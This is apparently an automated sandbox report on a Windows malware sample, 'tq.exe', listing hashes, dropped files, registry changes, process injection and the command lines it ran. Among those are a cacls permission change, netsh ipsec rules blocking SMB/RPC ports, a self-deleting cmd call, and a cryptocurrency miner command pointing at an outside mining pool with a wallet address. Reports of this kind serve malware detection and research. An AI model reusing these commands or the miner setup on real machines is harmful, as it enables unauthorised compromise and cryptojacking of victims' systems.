Analysis
-
max time kernel
123s -
max time network
148s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
07-05-2021 13:02
Static task
static1
Behavioral task
behavioral1
Sample
tq.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
tq.exe
Resource
win10v20210408
General
-
Target
tq.exe
-
Size
418KB
-
MD5
e8450e61f061fd90d74507eb04845ecd
-
SHA1
f344f20c57f9cb01ea3166f3404336da1519a832
-
SHA256
0bd2014bb1daba436cf1168ca4de9d3784afef3a4141c2305f786da543567c15
-
SHA512
d4497d9c37812c9d0733ab1785e4592cabb1fd5861d8b102c8eb351f0c96b8f70be8f27ac2e817976b751cfb8fd25167376df412bde8f966ea3a195086dd1a91
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 8 IoCs
Processes:
MS19.exeMS20.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exewudfhosts.exepid process 852 MS19.exe 1680 MS20.exe 580 MSSQLH.exe 276 1104 RunDllExe.exe 604 RunDllExe.exe 1988 x64.exe 1064 wudfhosts.exe -
Registers new Print Monitor 2 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\x64.exe upx C:\Users\Admin\AppData\Local\Temp\x64.exe upx \Users\Admin\AppData\Local\Temp\x64.exe upx C:\Users\Admin\AppData\Local\Temp\x64.exe upx C:\Windows\Cursors\wudfhosts.exe upx C:\Windows\Cursors\WUDFhosts.exe upx \Windows\Cursors\WUDFhosts.exe upx -
Loads dropped DLL 10 IoCs
Processes:
tq.exeMSSQLH.exesvchost.exesvchost.exepid process 1864 tq.exe 1532 1864 tq.exe 1684 1864 tq.exe 1864 tq.exe 580 MSSQLH.exe 580 MSSQLH.exe 1864 svchost.exe 1532 svchost.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Update[1].txt svchost.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
RunDllExe.exeRunDllExe.exesvchost.exedescription pid process target process PID 1104 set thread context of 332 1104 RunDllExe.exe svchost.exe PID 604 set thread context of 596 604 RunDllExe.exe svchost.exe PID 1864 set thread context of 1532 1864 svchost.exe svchost.exe -
Drops file in Windows directory 18 IoCs
Processes:
RunDllExe.exeRunDllExe.exex64.exeMSSQLH.exesvchost.exedescription ioc process File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File created C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\Logs\RunDllExe MSSQLH.exe File created C:\Windows\MpMgSvc.dll MSSQLH.exe File created C:\Windows\Logs\Vers.txt MSSQLH.exe File opened for modification C:\Windows\Cursors\WUDFhosts.exe x64.exe File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe File created C:\Windows\Help\active_desktop_render.dll x64.exe File opened for modification C:\Windows\Help\active_desktop_render.dll svchost.exe File created C:\Windows\Logs\RunDllExe.exe MSSQLH.exe File opened for modification C:\Windows\Logs\RunDllExe RunDllExe.exe File opened for modification C:\Windows\Logs\RunDllExe.dll RunDllExe.exe File created C:\Windows\Logs\RunDllExe_New RunDllExe.exe File created C:\Windows\Help\active_desktop_render_New.dll svchost.exe File created C:\Windows\Logs\RunDllExe.dll MSSQLH.exe File created C:\Windows\Logs\RunDllExe_New.dll RunDllExe.exe -
Modifies data under HKEY_USERS 24 IoCs
Processes:
svchost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecisionTime = e0cdaec44143d701 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecision = "0" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a07000e000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\32-e2-17-db-d2-77 svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadNetworkName = "Network" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77 svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32} svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{2A905F01-0A57-4E51-8685-54144DDC3A32}\WpadDecision = "0" svchost.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionReason = "1" svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e2-17-db-d2-77\WpadDecisionTime = e0cdaec44143d701 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
MSSQLH.exesvchost.exepid process 580 MSSQLH.exe 1532 svchost.exe 1532 svchost.exe 1532 svchost.exe 1532 svchost.exe 1532 svchost.exe -
Suspicious use of AdjustPrivilegeToken 34 IoCs
Processes:
MS20.exeMSSQLH.exesvchost.exewudfhosts.exedescription pid process Token: SeImpersonatePrivilege 1680 MS20.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 580 MSSQLH.exe Token: SeBackupPrivilege 580 MSSQLH.exe Token: SeSecurityPrivilege 580 MSSQLH.exe Token: SeTakeOwnershipPrivilege 580 MSSQLH.exe Token: SeRestorePrivilege 1532 svchost.exe Token: SeBackupPrivilege 1532 svchost.exe Token: SeSecurityPrivilege 1532 svchost.exe Token: SeTakeOwnershipPrivilege 1532 svchost.exe Token: SeLockMemoryPrivilege 1064 wudfhosts.exe -
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exesvchost.exesvchost.exepid process 1864 tq.exe 580 MSSQLH.exe 1104 RunDllExe.exe 604 RunDllExe.exe 1988 x64.exe 1864 svchost.exe 1532 svchost.exe 1532 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
tq.exeMSSQLH.exeRunDllExe.exeRunDllExe.exex64.exedescription pid process target process PID 1864 wrote to memory of 852 1864 tq.exe MS19.exe PID 1864 wrote to memory of 852 1864 tq.exe MS19.exe PID 1864 wrote to memory of 852 1864 tq.exe MS19.exe PID 1864 wrote to memory of 852 1864 tq.exe MS19.exe PID 1864 wrote to memory of 1680 1864 tq.exe MS20.exe PID 1864 wrote to memory of 1680 1864 tq.exe MS20.exe PID 1864 wrote to memory of 1680 1864 tq.exe MS20.exe PID 1864 wrote to memory of 1680 1864 tq.exe MS20.exe PID 1864 wrote to memory of 580 1864 tq.exe MSSQLH.exe PID 1864 wrote to memory of 580 1864 tq.exe MSSQLH.exe PID 1864 wrote to memory of 580 1864 tq.exe MSSQLH.exe PID 1864 wrote to memory of 580 1864 tq.exe MSSQLH.exe PID 580 wrote to memory of 324 580 MSSQLH.exe cacls.exe PID 580 wrote to memory of 324 580 MSSQLH.exe cacls.exe PID 580 wrote to memory of 324 580 MSSQLH.exe cacls.exe PID 580 wrote to memory of 324 580 MSSQLH.exe cacls.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 1104 wrote to memory of 332 1104 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 604 wrote to memory of 596 604 RunDllExe.exe svchost.exe PID 580 wrote to memory of 1988 580 MSSQLH.exe x64.exe PID 580 wrote to memory of 1988 580 MSSQLH.exe x64.exe PID 580 wrote to memory of 1988 580 MSSQLH.exe x64.exe PID 580 wrote to memory of 1988 580 MSSQLH.exe x64.exe PID 1988 wrote to memory of 1676 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1676 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1676 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1676 1988 x64.exe netsh.exe PID 1988 wrote to memory of 572 1988 x64.exe netsh.exe PID 1988 wrote to memory of 572 1988 x64.exe netsh.exe PID 1988 wrote to memory of 572 1988 x64.exe netsh.exe PID 1988 wrote to memory of 572 1988 x64.exe netsh.exe PID 1988 wrote to memory of 324 1988 x64.exe netsh.exe PID 1988 wrote to memory of 324 1988 x64.exe netsh.exe PID 1988 wrote to memory of 324 1988 x64.exe netsh.exe PID 1988 wrote to memory of 324 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1176 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1176 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1176 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1176 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1444 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1444 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1444 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1444 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1092 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1092 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1092 1988 x64.exe netsh.exe PID 1988 wrote to memory of 1092 1988 x64.exe netsh.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\tq.exe"C:\Users\Admin\AppData\Local\Temp\tq.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeC:\Users\Admin\AppData\Local\Temp\MS19.exe -l 6666 -p C:\ProgramData\MSSQLH.exe -t *2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeC:\Users\Admin\AppData\Local\Temp\MS20.exe -c C:\ProgramData\MSSQLH.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeC:\Users\Admin\AppData\Local\Temp\MSSQLH.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\Fonts\*.exe /e /d system3⤵
-
C:\Users\Admin\AppData\Local\Temp\x64.exex64.exe3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filterlist name=Filter14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=FilteraAtion1 action=block4⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Block filterlist=Filter1 filteraction=FilteraAtion14⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Block assign=y4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c del "C:\Users\Admin\AppData\Local\Temp\x64.exe"4⤵
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
C:\Windows\Logs\RunDllExe.exeC:\Windows\Logs\RunDllExe.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\SysWOW64\svchost.exe -k GraphicsPerf_SvcsGroup1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\svchost.exeC:\Windows\system32\svchost.exe2⤵
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\Cursors\wudfhosts.exeC:\Windows\Cursors\wudfhosts.exe -o xmr.usa-138.com:80 -u 4B7yFmYw2qvEtWZDDnZVeY16HHpwTtuYBg6EMn5xdDbM3ggSEnQFDWDHH6cqdEYaPx4iQvAwLNu8NLc21QxDU84GGxZEY7S3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
C:\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
C:\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
C:\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Cursors\wudfhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
C:\Windows\Logs\RunDllExeMD5
3b2bdaf477b27e6d0f7f1311e3d68764
SHA19fb60c5b1bf55891aeccef2ccd503b2558d05de1
SHA256b3fbb8197e3b63aaf4fffa06bd797e8fe8c52c5f03af3f832ee391b21bc304c3
SHA51223163f06ce9f53c30651e0f70f1964cb0b5d3bad3b0317e9fd36a7a85088e23b549aa240c1da5cfba1635cbad8966397d7d4f740b13f46982f4e79c178408299
-
C:\Windows\Logs\RunDllExeMD5
3b2bdaf477b27e6d0f7f1311e3d68764
SHA19fb60c5b1bf55891aeccef2ccd503b2558d05de1
SHA256b3fbb8197e3b63aaf4fffa06bd797e8fe8c52c5f03af3f832ee391b21bc304c3
SHA51223163f06ce9f53c30651e0f70f1964cb0b5d3bad3b0317e9fd36a7a85088e23b549aa240c1da5cfba1635cbad8966397d7d4f740b13f46982f4e79c178408299
-
C:\Windows\Logs\RunDllExe.dllMD5
1a2be7c1e9383a99423d7648874228da
SHA144763851cae05055fd22a555333dd20b77e3883a
SHA25619397f23a9707929b3f621d8f9419146c8c42c07e64c52d682fd6f636ad0c244
SHA5121858baaa56374ba7ffc274ee851781d2cae717365c13b1efc3f9276878f36bb2d1b4818e5f170bd3096f619e569fda1507d67abfb6a193aa61ac559ee05164c2
-
C:\Windows\Logs\RunDllExe.dllMD5
00ff0cc6b0d9e54b4ce33b95f6c0eaff
SHA1a1683279dd5db717b0fd61799344ff67db1e591a
SHA2563a13c88c252d8873a7828186cf40386720a77f8dbe74b62a295223ee36716dc0
SHA5122fec06212298912bb97e143c583502324f4a9ac4875d82fbde32d8c0fa72e1e6393d5755f372f494fe836a29049a8f0ad99faa13df2242638c4ed13c1a87557a
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
C:\Windows\Logs\RunDllExe.exeMD5
645564cf1c80e047a6e90ac0f2d6a6b7
SHA135e4b5e065b90fe5b1713e5a4645875f023b6a18
SHA2566f3a1b04d5398967356e42fb0245e26fb2d15c5e03db2650e225c6fbe9f6cef9
SHA512e4ce9ad7f83c84932b30641937c1b9fc9c2dbb647fa05743f8ec5f01b66a7813441b410166e181b432fc2ca47c7edbb94000bd4d389c53961c2a100f319a0c21
-
\??\c:\windows\help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
SHA512b2ee0b06da1a42c04ef54e36f4a66720698e1c2d58545854d0989ae805d00e760b8bc8815ab00dd8be208f7816ed4249855c9fa506427c1f89a3dfb309c734d6
-
\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
\Users\Admin\AppData\Local\Temp\MS19.exeMD5
af43611695488fcabec428adc17c47ce
SHA162c98fbc6e57317662369ca7a6bf249ba61e3ba9
SHA25633a7285470f1e33f1c1c0ed5644a2837694643e2c93c505912288e7c483fbf61
SHA512a2b6eb1338d1c7541b114753dc42cb676fb4c765e2f8e118d7e612863c6ccb0b1588902043f15531b43501d2c8f4325a127f400b8c3176ae07ff463d6e8d2778
-
\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
\Users\Admin\AppData\Local\Temp\MS20.exeMD5
262fa5258c0bbd68221eed7226c58cd3
SHA10d8f0d3054f9b7c315bb9dc904258c755c39e379
SHA256b7f22e9af63211806b1af562cd32868f8987451f40d392cc777aaba703a6b933
SHA512a15a572fbe4d893211358b35ab1fa2b328985f717806cfaeae28946f1f3461c7d11e6cfdd135650189c45ccbd7252c7c9948043a3bde510dc0ee5b5a70690f55
-
\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
\Users\Admin\AppData\Local\Temp\MSSQLH.exeMD5
4f824985f3aa38c89d6ce76e87f3f1c9
SHA18f5c01ef6f5f3aa1b470ad8bb75d0822802b85b5
SHA256dc9c54d7d9be92653b727c6a2b1537c0233c99a132595ec4ce651578b1bff1c4
SHA5121cf5860a03b76a5e1bcf49160a71fea967aff39215fc2625ebf323ad454afb967a0885670ffb0fe104f5eac93ba9ec61f482bff69436844a89d3f826ae6e4ed3
-
\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
\Users\Admin\AppData\Local\Temp\x64.exeMD5
1fc1c860e86a8fbc2021d2567d62f703
SHA142ea2c9f4548614574dff36e019ae1cbc68b54e3
SHA25676005ce2b7eb0c95f8dcc06b501244c73b17b3aff65e78c672c4a6ae56e67306
SHA512fb48f1837601a1bc7b2057d086414bc4a8478d3a3f17ea216e424d7d7509b825e35be8c7b6afb7ec91604058b2e4e230f8daba46fc04b30d3e0e1b473c20b67c
-
\Windows\Cursors\WUDFhosts.exeMD5
4a72e30c0a582b082030adfd8345014f
SHA12f92ccf13f8dfc7eeff49903a0d1ea8dd97a7353
SHA256e1315c41f50a75c308cdb023f7e48c0aa62931d5771ad8bc4220018ed5d7f976
SHA5128a75925b0695284105856823190531dc4cfcf32a8ae3226ef8c1f796185aa01f8c085b6457a63b1cf81842da2c6baafd4cabf7565a8d96d3460054439bbfb798
-
\Windows\Help\active_desktop_render.dllMD5
14e2b194b652d4fd912404775a6ae898
SHA1e93f529bb61e12c41426cb2b86176bf0af387c09
SHA25624ca5f0220c6bbcb081de1cd4e4115bb026cd45dbe34fc462a40b241b026d66c
